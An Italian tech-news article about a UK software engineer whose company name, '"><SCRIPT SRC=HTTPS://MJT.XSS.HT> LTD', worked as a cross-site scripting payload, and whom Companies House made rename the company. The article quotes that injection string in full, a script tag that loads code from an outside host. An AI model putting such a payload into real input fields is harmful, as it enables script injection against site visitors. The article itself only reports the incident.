NewsSicurezza

Un’azienda è stata costretta a cambiare nome per evitare una vulnerabilità

Il nome dell'azienda, che conteneva una riga di codice, poteva essere usato per attacchi di cross-site scripting contro pagine vulnerabili

Alcune aziende, in passato, hanno scelto la propria ragione sociale utilizzando righe di codice, ma ora una di queste è stata costretta a cambiare il suo nome a causa di una vulnerabilità. Secondo quanto riporta The Guardian, il registro delle imprese del Regno Unito, Companies House, ha costretto un consulente informatico a cambiare il nome della sua azienda dopo aver scoperto che poteva essere usato per attacchi di cross-site scripting contro pagine vulnerabili. E sì, tra queste c’è la stessa Companies House.

L’azienda ha dovuto cambiare il nome per evitare una vulnerabilità

L’azienda è stata fondata da un software engineer britannico, che a suo tempo scelse un nome a suo parere divertente e giocoso. Il nome iniziale dell’azienda, ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” però rischiava di creare confusione nei siti che non gestivano correttamente la formattazione HTML. Questi pensavano che il nome dell’azienda fosse vuoto ed eseguivano uno script dal sito di risoluzione dei problemi XSS Hunter. Era uno script innocuo, che avrebbe semplicemente mostrato un avvertimento, ma la Companies House non è stata disposta a correre rischi. Secondo un portavoce, infatti, il nome avrebbe potuto presentare un rischio per la sicurezza per alcuni siti.

Il consulente ha così cambiato la sua ragione sociale in “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”, ovvero “quell’azienda il cui nome conteneva tag di script HTML”. Questa vicenda dimostra quanto sia fragile la sicurezza dei siti web. Se un nome intelligente e scherzoso può causare un simile caos, è chiaro che ci sia molto lavoro da fare prima che i proprietari dei siti web pensino di avere una piattaforma sicura.

LG 24ML600S Monitor 24" Full HD LED IPS, 1920x1080, 1ms, AMD FreeSync 75Hz, Audio Stereo 10W, 2x HDMI 1.4 (HDCP 1.4), VGA, Uscita Audio, Schermo Antiriflesso, Flicker Safe, Bianco
  • Monitor 24" FullHD 1920 x 1080, AntiGlare, Flicker Safe
  • AMD FreeSync 75Hz, 250 cd/m2, colore calibrato
  • Pannello IPS per una visione ottimale da qualsiasi angolazione (16.7 M colori - NTSC 72%)
  • 1ms Motion Blur Reduction
  • Schermo Multitasking; ScreenSplit; Speaker stereo 10 W

Da non perdere questa settimana su Techbusiness

✒️ La nostra imperdibile newsletter Caffellattech! Iscriviti qui 
 
🎧 Ma lo sai che anche Fjona ha la sua newsletter?! Iscriviti a SuggeriPODCAST!
 
📺 Trovi Fjona anche su RAI Play con Touch - Impronta digitale!
 
💌 Risolviamo i tuoi problemi di cuore con B1NARY
 
🎧 Ascolta il nostro imperdibile podcast Le vie del Tech
 
💸E trovi un po' di offerte interessanti su Telegram!

Sara Grigolin

Amo le serie tv, i libri, la musica e sono malata di tecnologia. Soprattutto se è dotata di led RGB.

Ti potrebbero interessare anche:

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Back to top button